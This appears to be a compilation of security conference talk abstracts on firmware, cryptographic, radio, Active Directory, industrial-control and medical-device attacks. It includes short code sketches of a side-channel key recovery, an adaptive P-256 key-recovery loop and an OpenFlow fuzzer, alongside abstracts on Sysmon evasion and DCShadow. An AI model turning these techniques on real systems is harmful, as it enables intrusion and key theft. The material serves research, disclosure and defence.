If snapshots are deleted, the catalog and store files are deleted, and the content of the catalog file is destroyed. The store data, on the other hand, is left almost intact. This means we can access deleted snapshots if we can carve the store files and reconstruct the catalog from the recovered stores.
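A hedged sketch of the first carving step: sweep the raw volume image for 16 KiB-aligned blocks that begin with the VSS record identifier GUID (the byte values and block size here follow the libvshadow format notes and should be verified against them); a real carver then parses each block's record type and rebuilds catalog entries from the recovered store headers.

```python
import sys

# {3808876b-c176-4e48-b7ae-04046e6cc752} in its on-disk (little-endian) layout.
VSS_IDENTIFIER = bytes.fromhex("6b87083876c1484eb7ae04046e6cc752")
BLOCK = 0x4000   # assumed metadata block size/alignment

def find_vss_blocks(image_path):
    """Return offsets of blocks that look like VSS catalog/store metadata."""
    offsets = []
    with open(image_path, "rb") as img:
        offset = 0
        while True:
            chunk = img.read(BLOCK)
            if len(chunk) < len(VSS_IDENTIFIER):
                break
            if chunk.startswith(VSS_IDENTIFIER):
                offsets.append(offset)   # candidate catalog/store block
            offset += BLOCK
    return offsets

if __name__ == "__main__":
    for off in find_vss_blocks(sys.argv[1]):
        print(f"possible VSS metadata block at 0x{off:x}")
```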
Although Windows cannot access deleted snapshot data, our new tool, named vss_carver, and an extended vshadowmount command are able to handle this.
We will cover the details of the implementation and we will also give you several demonstrations with the new tools.
In recent years, we have been witnessing a steady increase in security vulnerabilities in firmware. Nearly all of these issues require local (often privileged) or physical access to exploit. In this talk, we will present novel *remote* attacks on system firmware.
In this talk, we will show different remote attack vectors into system firmware, including networking, updates over the Internet, and error reporting. We will also be demonstrating and remotely exploiting vulnerabilities in different UEFI firmware implementations which can lead to installing persistent implants remotely at scale. The proof-of-concept exploit is less than 800 bytes.
How can we defend against such firmware attacks? We will analyze the remotely exploitable UEFI and BMC attack surface of modern systems, explain specific mitigations for the discussed vulnerabilities, and provide recommendations to detect such attacks and discover compromised systems.
With a 19-year-old vulnerability, we were able to sign a message with the private key of Facebook. We'll show how we found one of the oldest TLS vulnerabilities in products of 10 different vendors and how we practically exploited it on famous sites. We'll also discuss how the countermeasures introduced back in TLS 1.0 and expanded over the years failed to prevent this and why RSA PKCS #1 v1.5 encryption should be deprecated. Finally, we'll present what related problems are still present and unfixed in many popular TLS libraries.
Toshiba FlashAir cards are wireless SD cards used by photographers and IoT enthusiasts. They integrate both a Japanese SoC and a Japanese operating system. Neither had been discussed at security conferences, nor clearly identified, before this project. The SoC is employed in embedded devices as well as in the automotive industry. The ISA looks like MIPS, with funny instructions such as loops! The OS implements an RTOS specification that is believed to represent 60% of the embedded OSes currently deployed, according to a survey by its designers.
This talk will present investigations that lead to the discovery of the architecture and the operating system from nearly zero knowledge of the card. These investigations were performed with open-source tools only: miasm2 is used as the assembly, disassembly and emulation backend, while radare2 is used as the interface to reverse the firmware. Specific tools were developed during this project and will be released after the talk.
The methodology used and the steps that led to code execution on the card will be laid out in detail. Some involved reading assembly, while others were achieved by consulting online documentation in English and Japanese. The main goal is to share lessons learned as well as mistakes made during the project.
Finally, a complete demonstration of code execution will be given.
The drive for ever smaller and cheaper components in microelectronics has popularized so-called "mixed-signal circuits," in which analog and digital circuitry reside on the same silicon die. A typical example is WiFi chips, which include a microcontroller (digital logic) implementing crypto and protocols, together with the radio transceiver (analog logic). The special challenge of such designs is to separate the "noisy" digital circuits from the sensitive analog side of the system.
In this talk, we show that although isolation of digital and analog components is sufficient for those chips to work, it's often insufficient for them to be used securely. This leads to novel side-channel attacks that can break cryptography implemented in mixed-design chips over potentially large distances. This is crucial as the encryption of wireless communications is essential to widely used wireless technologies, such as WiFi or Bluetooth, in which mixed-design circuits are prevalent on consumer devices.
The key observation is that in mixed-design radio chips the processor's activity leaks into the analog portion of the chip, where it is amplified, up-converted and broadcast as part of the regular radio output. While this is similar to electromagnetic (EM) side-channel attacks which can be mounted only in close proximity (millimeters, and in a few cases a few meters), we show that it is possible to recover the original leaked signal over large distances on the radio. As a result, variations of known side-channel analysis techniques can be applied, effectively allowing us to retrieve the encryption key by just listening on the air with a software defined radio (SDR).
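As a rough illustration (not the authors' tooling), the "variations of known side-channel techniques" boil down to correlating a leakage hypothesis against the demodulated traces. A toy correlation attack might look like the sketch below; the leakage model and the trace capture are deliberate placeholders.

```python
# Toy correlation-based key-byte recovery over captured traces.
# `traces` is an (n_traces, n_samples) array of demodulated amplitude
# values recovered from the radio signal; `plaintexts` holds the known
# input byte processed in each trace. The leakage model is a placeholder.
import numpy as np

def hamming_weight(x: int) -> int:
    return bin(x).count("1")

def recover_key_byte(traces: np.ndarray, plaintexts: np.ndarray) -> int:
    best_guess, best_corr = 0, 0.0
    for guess in range(256):
        # Placeholder leakage model: HW of an intermediate value that
        # depends on the key guess (a real attack models the cipher step).
        hyp = np.array([hamming_weight(int(p) ^ guess) for p in plaintexts], float)
        for sample in range(traces.shape[1]):
            corr = abs(np.corrcoef(hyp, traces[:, sample])[0, 1])
            if corr > best_corr:
                best_guess, best_corr = guess, corr
    return best_guess
```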
Over the last fifteen years, many large software development organizations have adopted Security Development Lifecycle (SDL) processes as effective approaches to delivering secure software. Motivation for SDL comes from the realization that software vulnerabilities can have real impacts – on information security, on organizations' reputations, on customer satisfaction, and on revenues. But what if you don't have 40,000 developers and instead run a small-to-medium dev shop?
Fortunately, SDL adoption need not be "only for the rich." While large organizations have the resources to create large teams and customized tools, smaller organizations have the advantage that they can focus an SDL on the specific products, tools, and threats that are relevant to the software they produce. They can also benefit from a wide array of free and affordable resources that can help them address many of the challenges posed by creating and sustaining an SDL program. With management commitment to SDL fundamentals and an investment of resources proportional to the size of the development organization and its products, it's possible for small organizations to build an SDL program and deliver software that customers will find secure.
This briefing will describe some resources that can help smaller organizations create an effective SDL program. It will also outline some secure development concerns that may be especially important to those organizations – such as dependence on software they didn't write – and ways that they can address those concerns.
SirenJack is a vulnerability that was found to affect radio-controlled emergency warning siren systems from ATI Systems. It allows a bad actor, with a $30 handheld radio and a laptop, to set off all sirens in a deployment. Hackers can trigger false alarms at will because the custom digital radio protocol does not implement encryption in vulnerable deployments.
Emergency warning siren systems are public safety tools used to alert the population of incidents, such as weather and man-made threats. They are widely deployed in cities, industrial sites, military installations, and educational institutions across the US and abroad.
Sirens are often activated via a radio frequency (RF) communications system to provide coverage over a large area. Does the security of these RF-based systems match their status as critical infrastructure? The 2017 Dallas siren hack showed that many older siren systems are susceptible to replay attacks, but what about more modern ones?
I studied San Francisco's Outdoor Public Warning System, an ATI deployment, for two years to learn how it was controlled. After piecing together clues on siren poles, and searching the entire radio spectrum for one unknown signal, I found the system's frequency and began passive analysis of the protocol. Monitoring the weekly siren tests, I made sense of patterns in the raw binary data and found the system was insecure and vulnerable to attack.
This presentation will take you on the journey of the research, and detail the tools and techniques used, including leveraging Software Defined Radio and open source software to collect and analyse massive sets of RF data, and analyse a custom digital protocol. It will also cover the Responsible Disclosure process with the vendor, their response, and subsequent change to the protocol. A proof-of-concept will be shown for good measure.
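As a generic illustration of the SDR workflow (the protocol specifics belong to the talk), turning a narrowband FSK capture into raw bits can be as simple as taking the instantaneous frequency of the IQ samples and slicing it at the symbol rate. The file name, sample rate, and symbol rate below are placeholders.

```python
# Minimal 2-FSK-to-bits sketch over a raw IQ capture (complex64 samples).
# 'capture.iq', SAMPLE_RATE, and SYMBOL_RATE are hypothetical values.
import numpy as np

SAMPLE_RATE = 250_000       # samples per second (placeholder)
SYMBOL_RATE = 1_000         # symbols per second (placeholder)

iq = np.fromfile("capture.iq", dtype=np.complex64)

# Instantaneous frequency ~ phase difference between consecutive samples.
freq = np.angle(iq[1:] * np.conj(iq[:-1]))

# Average the frequency estimate over each symbol period, then slice.
sps = SAMPLE_RATE // SYMBOL_RATE
n_symbols = len(freq) // sps
symbols = freq[: n_symbols * sps].reshape(n_symbols, sps).mean(axis=1)
bits = (symbols > symbols.mean()).astype(int)

print("".join(map(str, bits[:64])))   # first bits of the recovered stream
```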
To keep up with the growing demand for always-on and available-anywhere connectivity, the use of cellular, compared with other wireless connectivity options in the electromagnetic spectrum, is rapidly expanding. My research in the IoT space led me down the path of discovering a variety of vulnerabilities related to cellular devices manufactured by Sierra Wireless and many others. Proper disclosures have occurred; however, many manufacturers have been slow to respond. This led to examining numerous publicly disclosed vulnerabilities considered "low-hanging fruit" against cellular devices and other cellular-based network modems that are often deployed as out-of-band management interfaces. The research expanded through the details provided in the configuration templates available from each device, including the following:
- Wireless Network Information
- IPSec Tunnel Authentication Details
- Connected devices and services
Using a series of obfuscated examples to protect the organizations, people, and companies identified, this presentation focuses on the services and systems information of the following commonly deployed cellular-connected devices, to provide an in-depth look at what is easily possible:
- Emergency Response systems
- Resource collection systems
- Transportation Safety
- Out of band management
"They told me I could be anything I wanted, so I became a Domain Controller."
While SAMBA has implemented the Active Directory replication protocol for years, it was not easy to abuse, especially on the Windows OS. The lsadump::DCSync feature in mimikatz was the first breakthrough in this area. Red teamers could extract the secrets needed for Kerberos token abuse and even impersonate domain controllers. In short, read access to the AD database.
Let's be granted write access! It's time to invoke the full power of a domain controller with the new lsadump::DCShadow attack implemented in mimikatz and introduced at BlueHat IL 2018 by the mimikatz and PingCastle authors.
The immediate benefit of DCShadow is to bypass SIEMs, which look at logs collected from all DCs except this specific one. But what if the replication data doesn't follow the specification? Can we do more?
Let's be creative and push partial changes, or changes forbidden by the specification: can we create backdoors with a Golden Ticket? Reach unprotected trusts via NTLM? Target admins via monitoring reports? Is the object class immutable? Can we play god by creating and killing objects at will? More?
That's not the end: once replication data and internal attributes are owned by the attacker, forensic analysts will have a hard time doing their job.
Is DCShadow a game changer like DCSync was at its time?
Almost all security research leaves one question unanswered: what would be the financial consequence if a discovered vulnerability were maliciously exploited? The security community almost never knows, unless a real attack takes place and the damage becomes known to the public. The development of cryptocurrencies has made it even harder to contain the impact of an attack, since all of the security relies on a single wallet private key that needs to stay secure. Multiple breaches of private wallets and public currency exchange services are well known, and to address the issue a few companies have come up with secure hardware storage devices that preserve the wallet's secrets at all costs.
But how secure are they? In this research, we show how software attacks can be used to break into the most protected part of the hardware wallet, the Secure Element, and how it can be exploited by an attacker. The number of identified vulnerabilities in the hardware wallet shows how software vulnerabilities in the TEE operating system can compromise memory isolation and reveal the secrets of the OS and other user applications. Finally, based on the identified vulnerabilities, we propose an attack that allows anyone with only physical access to the hardware wallet to retrieve secret keys and data from the device. We also describe a supply chain attack on the device that allows an attacker to bypass its security features and take full control of the installed wallets.
The Go implementation of the P-256 elliptic curve had a small bug due to a misplaced carry bit affecting less than 0.00000003% of field subtraction operations. We show how to build a full practical key recovery attack on top of it, capable of targeting JSON Web Encryption.
Go issue #20040 affected the optimized x86_64 assembly implementation of scalar multiplication on the NIST P-256 elliptic curve in the standard library.
p256SubInternal computes x - y mod p. In order to be constant time, it has to do the math both for x >= y and for x < y; it then chooses the result based on the carry bit of x - y. The old code chose wrong (CMOVQNE vs CMOVQEQ), but most of the time compensated by adding a carry bit that didn't belong there (ADCQ vs ANDQ). Except when it didn't, once in a billion times (when x - y < 2^256 - p). The whole patch is 5 lines.
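The intended behavior is easy to state in a few lines. A Python sketch of a constant-time-style x - y mod p (not the Go assembly itself) shows where the condition matters; selecting on the wrong side of that borrow, as in the CMOVQNE/CMOVQEQ mixup, is exactly the kind of error that only surfaces for rare inputs.

```python
# Sketch of x - y mod p with branchless selection on the borrow.
# p256SubInternal must return x - y if x >= y, and x - y + p otherwise,
# choosing between the two with a mask rather than a branch.
P = 2**256 - 2**224 + 2**192 + 2**96 - 1   # the NIST P-256 prime
MASK = 2**256 - 1

def sub_mod_p(x: int, y: int) -> int:
    """Assumes 0 <= x, y < P."""
    diff = (x - y) & MASK                  # 256-bit wrapping subtraction
    borrow = 1 if x < y else 0             # the "carry bit" of x - y
    select = -borrow & MASK                # all-ones mask iff borrow == 1
    return (diff + (P & select)) & MASK    # add p back only if we borrowed
```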
The bug was found by a Cloudflare engineer because it caused ECDSA verifications to fail erroneously but the security impact was initially unclear. We devised an adaptive bug attack that can recover a scalar input to ScalarMult by submitting attacker-controlled points and checking if the result is correct, which is possible in ECDH-ES.
We reported this to the Go team, Go 1.7.6 and 1.8.2 were issued and the vulnerability was assigned CVE-2017-8932.
At a high level, this P-256 ScalarMult implementation processes the scalar in blocks of 5 bits. We can precompute points that trigger the bug for each specific 5-bit value, and submit them. When the protocol fails, we learn 5 key bits, and we move on to the next 5, Hollywood style. In about 500 submissions on average we recover the whole key.
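In pseudocode, the adaptive loop is short. The two helpers below are placeholders for the real attack machinery: craft_point stands for the precomputation of a point that triggers the carry bug only when the current 5-bit block equals the guess, and protocol_fails stands for observing whether the victim's ECDH-ES computation (e.g., a JWE decryption) went wrong.

```python
# Hedged sketch of the adaptive key-recovery loop described above.

def craft_point(known_bits: int, block: int, guess: int):
    """Placeholder: a point engineered so the carry bug fires only when
    the victim's 5-bit block `block` equals `guess`, given the bits
    already recovered."""
    raise NotImplementedError("attack-specific precomputation")

def protocol_fails(point) -> bool:
    """Placeholder oracle: run the ECDH-ES exchange with `point` and
    report whether the victim computed a wrong shared point."""
    raise NotImplementedError("protocol-specific check")

def recover_scalar(num_blocks: int) -> int:
    known_bits = 0
    for block in range(num_blocks):
        for guess in range(32):                  # 5 bits per block
            if protocol_fails(craft_point(known_bits, block, guess)):
                known_bits |= guess << (5 * block)
                break
    return known_bits
```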
In this talk, we will unveil the new in-house capabilities of a nation state actor who has been observed deploying both Android and iOS surveillance tooling, known as Stealth Mango and Tangelo. The actor behind these offensive capabilities has successfully compromised the devices of government officials and military personnel in numerous countries, with some compromises directly impacting Western interests. Our research indicates this capability has been created by freelance developers who primarily release commodity spouse-ware but moonlight by selling their own custom surveillanceware to state actors. One such state actor has been observed deploying Stealth Mango, and this presentation will unveil the depth and breadth of their campaigns, detailing not only how we watched them grow and develop, test, QA, and deploy their offensive tooling, but also how operational security mistakes ultimately led to their attribution.
Software companies can have hundreds of software products in-market at any one time, all requiring support and security fixes, some on tight release timelines and some with no releases planned at all. At the same time, the velocity of open source vulnerabilities that rapidly become public, and of vulnerabilities found within internally written code, can challenge the best intentions of any SDLC.
How do you prioritize publicly known vulnerabilities against internally found vulnerabilities? When do you hold a release to update that library for a critical vulnerability fix when it's already slipped? How do you track unresolved vulnerabilities that are considered security debt? You ARE reviewing the security posture of your software releases, right?
For a software developer, product owner, or business leader, being able to prioritize software security fixes against revenue-generating features and customer expectations is a critical function of any development team. Dealing with the reality of increased security-fix pressure and expectations of immediate security fixes on tight timelines is becoming the norm.
This presentation looks at the real world process of the BlackBerry Product Security team. In partnership with product owners, developers, and senior leaders, they've spent many years developing and refining a software defect tracking system and a risk-based release evaluation process that provides an effective software 'security gate.' Working with readily available tools and longer-term solutions including automation, we will provide solutions attendees can take away and implement immediately.
• Tips on how to document, tag, and track security vulnerabilities and their fixes, and how to prioritize them into release targets
• Features of common tools (JIRA, Bugzilla, and Excel) you may not know of, and examples of simple automation you can use to verify ticket resolution (a minimal sketch follows this list)
• A guide to building a release review process, when to escalate to gate a release, who to inform, and how to communicate.
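As a taste of the "simple automation" mentioned above, here is a minimal sketch that pulls unresolved security-tagged tickets out of JIRA's REST search API and tallies them by priority. The base URL, project key, label, and credentials are placeholders for whatever your instance uses.

```python
# Minimal sketch: count unresolved security-labeled tickets per priority
# via JIRA's REST search API. URL, JQL, and auth values are placeholders.
import requests

JIRA = "https://jira.example.com"
JQL = 'project = PROD AND labels = security AND resolution = Unresolved'

resp = requests.get(
    f"{JIRA}/rest/api/2/search",
    params={"jql": JQL, "fields": "priority", "maxResults": 500},
    auth=("svc-account", "api-token"),   # placeholder credentials
    timeout=30,
)
resp.raise_for_status()

counts = {}
for issue in resp.json()["issues"]:
    prio = (issue["fields"].get("priority") or {}).get("name", "Unset")
    counts[prio] = counts.get(prio, 0) + 1

for prio, n in sorted(counts.items()):
    print(f"{prio}: {n} open security tickets")
```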
Hacking is high-risk and high-reward, with a high cost to human capital. In this session, we will talk about the effects of human factors in cyber operations and why you should care about them. Specifically, we will focus on the results of research at the National Security Agency that studied the effects of cognitive stress on tactical cyber operators. A key motivation for this work was the intuition that cognitive stress may negatively affect operational security, work performance, and employee satisfaction. Operator fatigue, frustration, and cognitive workload increase significantly over the course of a tactical cyber operation. Fatigue and frustration are correlated: as one increases, so does the other. The longer the operation, the greater the mental demand, physical demand, time pressure, frustration, and overall effort needed to complete it. Operations longer than 5 hours show 10% greater increases in fatigue and frustration compared to shorter operations. We found no link between performance and operation length; that is, from the operator's perspective, longer operations did not result in higher success. Knowing how these factors affect cyber operations has helped us make more informed decisions about mission policy and workforce health. We hope that by sharing this with the greater Black Hat community, they will also be able to learn from our study and improve their own cybersecurity operations.
While security products are a great supplement to the defensive posture of an enterprise, to well-funded nation-state actors they are an impediment to achieving their objectives. Pentesters may argue about the efficacy of a product because it doesn't detect their specific offensive technique; mature actors, however, recognize a need to holistically subvert the product at every step during the course of their operation.
Sysmon, a security tool used widely by defenders as well as several security vendors, is a great target on which to demonstrate a formalized approach to evasion and tampering. This talk will cover host footprint analysis, evasion, tampering, and rule auditing/bypass strategies. Specific strategies covered will include attack surface analysis, determining evasion "paths of least resistance," and identification of narrow, "exploitable" detections. By the end of the talk, it will become evident that the strategies applied to Sysmon can be easily applied to any security product.
Are security product vendors preparing themselves to be resilient against threats specifically targeting their product? Should they be? It is inevitable that capabilities will be developed against security products. Armed with that knowledge, how should vendors respond? You be the judge by applying a more systematic methodology to assessing security products.
The term 'air-gap' in cyber security refers to a situation in which a sensitive computer, classified network, or critical infrastructure is intentionally physically isolated from public networks such as the Internet. Air-gap isolation is mainly used to maintain trade secrets, protect confidential documents, and prevent personal information from being leaked out, accidentally or intentionally.
In this talk, we focus on 'Bridgeware', a type of malware which allows attackers to overcome ('bridge') air-gap isolation in order to leak data. We talk about various covert channels proposed over the years, including electromagnetic, magnetic, acoustic, thermal, electrical and optical methods (and introduce a new air-jumping technique from our recent research). We examine their characteristics and limitations, including bandwidth and effective distance. We also discuss the relevance of these threats and the likelihood of related cyber-attacks in the modern IT environment. Finally, we present different types of countermeasures to cope with this type of threat. We will include demo videos.
Software-Defined Networking (SDN) is getting attention today as the next generation of networking. The key concept of SDN is to decouple the control logic from traditional network devices so that network developers can design innovative network functions in a more flexible and programmable way. However, SDN does not only bring us advantages. Security experts have constantly raised security concerns about SDN, and some vulnerabilities have been uncovered in the real world. If SDN is not secure, how can we measure the security level of SDN environments?
In this talk, we introduce a powerful penetration testing tool for SDN called DELTA, which is officially supported by the Open Networking Foundation (ONF). First, DELTA can automate diverse published attack scenarios against various SDN components, from testing to evaluation. Also, to discover unknown vulnerabilities that may exist in SDN, DELTA leverages a blackbox fuzzing technique that randomizes different control flows in SDN. This enables us to systematically reveal unknown security issues, in contrast to the empirical and ad hoc methods that most previous studies use. By using DELTA, anyone can easily and thoroughly test not only popular open source SDN controllers (i.e., ONOS, OpenDaylight, Floodlight, and Ryu), but also SDN-enabled switches (i.e., Open vSwitch, HP, and Pica8) in the real world.
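To give a flavor of what blackbox control-channel fuzzing looks like at the byte level (an illustrative sketch, not DELTA itself), a fuzzer can speak just enough OpenFlow to open a session and then push randomly mutated control messages toward the controller. The controller address and message template are placeholders.

```python
# Illustrative sketch (not DELTA): open an OpenFlow session and send
# randomly mutated control messages to a controller on the standard port.
import random
import socket
import struct

CONTROLLER = ("192.0.2.10", 6653)        # placeholder controller address

def ofp_header(msg_type: int, length: int, xid: int) -> bytes:
    # OpenFlow 1.3 header: version, type, length, xid.
    return struct.pack("!BBHI", 0x04, msg_type, length, xid)

def mutate(msg: bytes) -> bytes:
    buf = bytearray(msg)
    for _ in range(random.randint(1, 4)):
        buf[random.randrange(len(buf))] = random.randrange(256)
    return bytes(buf)

with socket.create_connection(CONTROLLER) as s:
    s.sendall(ofp_header(0, 8, 1))                    # OFPT_HELLO
    for xid in range(2, 1000):
        s.sendall(mutate(ofp_header(2, 8, xid)))      # mutated echo requests
```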
We will show nine new attack cases that have been found by DELTA but never been announced before.
Also, we will discuss:
- What control flows exist in SDN, and why they are a key feature compared to traditional networks.
- The key components and workflow DELTA uses to attack real SDN components.
- The nine new attack cases discovered by DELTA, with demonstrations. For example, one of the new attacks violates a table condition, leading to a black hole in packet handling in the switch.
WebAssembly is a new standard that allows assembly-like code to run in browsers at near-native speed. But how does WebAssembly work, and how does it execute code while maintaining the security guarantees of a browser? This presentation gives an overview of the features of WebAssembly, as well as examples of vulnerabilities that occur in each feature. It will also discuss the future of WebAssembly, and emerging areas of security concern. Learn to find bugs in one of the newest and fastest growing parts of the browser!
The wisdom on why it is difficult to recruit and retain women in the industry has changed over the past decade; the speaker will share the latest information about the most successful approaches and results from a recent working group on acquiring and retaining female technology leaders. The speaker will also discuss how the methodologies used in studies affect the trustworthiness of the conclusions and how to get insight into your workforce using readily-available tools. Participants will leave with a core understanding of why the gender gap in cyber security exists, how to collect information from systems and people in your organization to gain valuable insights, and how a scorecard methodology created by diverse cyber security engineers working in the industry can help identify areas for improvement.
Welcome to a data center! A place where the air conditioner never stops and the long line of tiny red and blue LEDs dances chaotically over the sounds of the never-ending fans, playing in unison.
One thing is certain, everyone avoids data centers like the plague. And, like one of the greatest leaders of our time once said: "Behind every need, there is a right" (or in this case, a product).
Welcome to the world of Out of Band Power Management devices, where vendors decide to put an extra microprocessor inside the motherboard to allow you to remotely monitor heat, fans, and power.
We decided to take a look at these devices and what we found was even worse than what we could have imagined. Vulnerabilities that bring back memories from the 1990s, remote code execution that is 100% reliable and the possibility of moving bidirectionally between the server and the BMC, making not only an amazing lateral movement angle, but the perfect backdoor too.
All Windows researchers know about RPC and ALPC, and the attack surface provided through the kernel's system call layer, just as they know about shared memory, the object manager, the registry, and countless other more 'creative' kernel mechanisms that allow cross-process data sharing and communication, such as raw ETW or atom tables.
But since Windows 8, the kernel has implemented a new facility, accessible from all application layers, which has grown in complexity and use to cover major Windows technologies, without anyone going into its implementation details: the Windows Notification Facility (WNF).
Originally intended to support "Toast" notifications and Windows Push Notifications, WNF has grown today into a generalized framework for internal system communication, coordination, synchronization, and notification of various user and system events, across the kernel/user boundary (and between user applications). Launching a process causes a WNF notification. Making a phone call causes a notification. Your GPS location changing causes a notification. Lack of input for N minutes causes a notification. Installing a start menu tile causes a notification. Such examples only scratch the surface -- there are over a thousand different notification IDs which dozens of 'publishers' will issue, to be consumed by countless 'consumers', including multiple kernel drivers.
WNF isn't only an incredible way to gather information on user and application behavior on the system. WNF registrations can be made to 'persist' across system reboots, and interesting persistence can be achieved through this obscure mechanism, especially given the user/kernel boundary crossing. Each WNF registration is also fully securable through the standard Windows security descriptor model -- and like other securable entities, not all descriptors are configured optimally.
Notifications, by the way, are not merely 'signaled events' indicating something has happened. Each notification can contain a payload of up to 4KB of data, and consumers will often parse that data (sometimes incorrectly, or too trustingly) as part of receiving the signal. This means that, beyond being a useful way of snooping on or faking behaviors by messing with what consumers 'trust' from their producers, the payload data itself can be manipulated/fuzzed to cause parsing bugs (including in kernel consumers). Furthermore, once posted, payload data persists, such that a malicious reader could obtain interesting data from someone else's notification (including, sometimes, uninitialized buffers containing pointers and other private heap data). Such payload data can even persist across reboots for permanent WNF notifications.
On top of all of these interesting use cases, all of Windows' 'hidden' features that are A/B tested in preview builds (aka the 'velocity flags') are also implemented behind WNF. A 4KB WNF blob is used to encode which A/B-testable velocity flags are enabled for a particular install, and playing with WNF can unlock new Windows behaviors (or disable them) months ahead of official release.
WNF is *not* merely a layer built upon ETW, or ALPC, or any other kernel mechanism you're likely to be familiar with -- it's a completely internal mechanism not exposed through the object manager or any other existing API, available only through a set of undocumented NT system calls (and even more undocumented Kernel32/NTDLL library wrappers). Your Next Gen EDR tools, ETW Sysmon logging tools, super Windows Defender All The Guard ATP Edition tools, and forensic debugger tools have no visibility into it, and attackers might be using it behind your back. As part of this talk, three initial WNF exploitation, fuzzing, and forensic tools will be released to tip the scales for the blue team, after 6 years of kernel obscurity.
Automotive security is a hot topic, and hacking cars is cool. These vehicles are suffering the growing pains seen in many embedded systems: security is a work-in-progress, and in the meantime we see some fun and impressive hacks. Perhaps the most well-known examples are the Jeep and Tesla hacks. But, we know that the industry is paying attention. Consider a bright future where secure boot methods have been universally implemented, without obvious bugs; adversaries no longer have access to unencrypted firmware, ECUs refuse to run any unsigned code, and we feel safe again. Will automotive exploitation be "mission impossible", or do hackers still have a few tricks up their sleeve?
We will demonstrate how hardware attacks like Fault Injection can be used to obtain the firmware from secure ECUs in which software vulnerabilities are absent. Once we have the firmware, we will discuss successful approaches for efficient analysis of automotive firmware. To provide a concrete example, we will demonstrate the custom emulator we wrote for one of our targets (an instrument cluster) and show that it can accurately perform dynamic analysis. Our emulator allows us to quickly understand the firmware's functionality, extract secrets of interest to an attacker, and apply fuzzing to the target's interfaces. Finally, we explain the real-world impact of these issues, how they lead to scalable attacks, and what can be done to defend today's cars.
Attacks always get better, and that means your threat modeling needs to evolve. This talk looks at what's new and important in threat modeling, organizes it into a simple conceptual framework, and makes it actionable. This includes new properties of systems being attacked, new attack techniques (like biometrics confused by LEDs) and a growing importance of threats to and/or through social media platforms and features. Take home ways to ensure your security engineering and threat modeling practices are up-to-date.
We present TLBleed, a novel side-channel attack that leaks information out of Translation Lookaside Buffers (TLBs). TLBleed provides a reliable side channel without relying on the CPU data or instruction caches, and therefore bypasses several proposed CPU cache side-channel protections, such as page coloring, CAT, and TSX. Our TLBleed exploit successfully leaks a 256-bit EdDSA key from cryptographic signing code that would be safe from cache attacks with cache isolation turned on, but is no longer safe with TLBleed. We achieve a 98% success rate after just a single observation of a signing operation on a co-resident hyperthread and just 17 seconds of analysis time. Further, we show how another exploit based on TLBleed can leak bits from a side-channel resistant RSA implementation. We use novel machine learning techniques to achieve this level of performance, and these techniques will likely improve the quality of future side-channel attacks. This talk contains details about the architecture and complex behavior of modern, multilevel TLBs on several modern Intel microarchitectures, which are undocumented and will be publicly presented for the first time.
In 2017, a sophisticated threat actor deployed the TRITON attack framework, engineered to manipulate industrial safety systems at a critical infrastructure facility. This talk offers new insights into the TRITON attack framework, which became an unprecedented milestone in the history of cyber-warfare as the first publicly observed malware that specifically targets protection functions meant to safeguard human lives. While the attack was discovered before its ultimate goal was achieved, that is, disruption of the physical process, TRITON is a wake-up call regarding the need to urgently improve ICS cybersecurity.
This analysis and presentation will cover:
- How the threat actors could have obtained the targeted equipment, firmware and documentation, based on our own experience,
- The level of resources (time, money, expertise) required to develop a sophisticated embedded implant like TRITON,
- The advanced methods used by the malware for a multi-stage injection of the backdoor into the controller of the Schneider Electric Triconex safety shutdown system, derived from both static and dynamic analysis of the code,
- A demo of how the TRITON malware executes on a running Triconex controller,
- Why the attacker possibly failed to inject the payload.
We will conclude with an appeal to vendors about the urgent need for equipment auditing and forensic tools. These tools must be developed before TRITON-like attacks become mass-scale, and the time to start working on them is now; hacking is a fashion industry: as soon as a new exploitation technique becomes available, everybody jumps on the bandwagon.
This session will thus provide comprehensive insights into how one of the most sophisticated attacks on an ICS system to date was developed and how it could be detected during and post exploitation. This is important information for anyone seeking to secure critical infrastructure.
Why do people choose to use (or not use) two-factor authentication (2FA)? We report some surprising results from a two-phase study of the Yubico Security Key, conducted in cooperation with Yubico. Despite the Yubico Security Key being among the best in class for usability among hardware tokens, participants in a think-aloud protocol encountered surprising difficulties, with none in the first round able to complete enrollment without guidance. For example, a website demo built to make adoption simple instead resulted in profound confusion when participants fell into an infinite loop of inadvertently only play-acting the installation. We report on this and other findings of a two-phase experiment that analyzed the acceptability and usability of the Yubico Security Key, a 2FA hardware token implementing Fast Identity Online (FIDO). We made recommendations, and then tested the new interaction. A repeat of the experiment showed that these recommendations enhanced ease of use but not necessarily acceptability. The second stage identified the remaining primary reasons for rejecting 2FA: fear of losing the device, illusions of personal immunity to risk on the internet, and confidence in personal risk perceptions. Being locked out of an account was something every participant had suffered, while losing control of their account was a distant, remote, and heavily discounted risk. The presentation will surprise and inform practitioners, showing them that usability is not just common sense; in fact, sometimes you need to think sideways to align yourself with your potential users.
There has been significant attention recently surrounding the risks associated with cyber vulnerabilities in critical medical devices. Understandably, people are concerned that an attacker may exploit a vulnerability to modify the delivery of patient therapy, such as altering the dosage of medicine, delivering insulin therapy, or administering a shock via a pacemaker. These concerns raise several questions, such as: How do these devices work? What does the typical attack surface for implanted medical device look like? What do exploits against these systems look like? How do manufacturers respond to potentially life-threatening security issues? This presentation will address all these questions.
This presentation is the culmination of an 18-month independent case study of implanted medical devices. The presenters will provide detailed technical findings on remote exploitation of a pacemaker system, pacemaker infrastructure, and a neurostimulator system. Exploitation of these vulnerabilities allows for the disruption of therapy as well as the ability to deliver shocks to a patient.
The researchers followed coordinated disclosure policies in an attempt to help mitigate the security concerns. What followed was an 18-month roller coaster of unresponsiveness, technical inefficiencies and misleading reactions. The researchers will walk the audience through the details of disclosure and discuss the responses from the manufacturer and coordination associated with DHS ICS-CERT and the FDA. How did the manufacturer initially respond? What tactics did the manufacturer use to attempt to dismiss the independent researchers? Was the response by the manufacturer adequate from a patient responsibility standpoint? Has the actual technical vulnerability even been addressed?
Malware authors implement many different techniques to frustrate analysis and make reverse engineering malware more difficult. Many of these anti-analysis and anti-reverse engineering techniques attempt to send a reverse engineer down an incorrect investigation path or require them to invest large amounts of time reversing simple code. This talk analyzes one of the most robust anti-analysis native libraries we've seen in the Android ecosystem.
I will discuss each of the techniques the malware author used in order to prevent reverse engineering of their Android native library including manipulating the Java Native Interface, encryption, run-time environment checks, and more. This talk discusses not only the techniques the malware author implemented to prevent analysis, but also the steps and process for a reverse engineer to proceed through the anti-analysis traps. This talk will give you the tools to expose what Android malware authors are trying to hide.
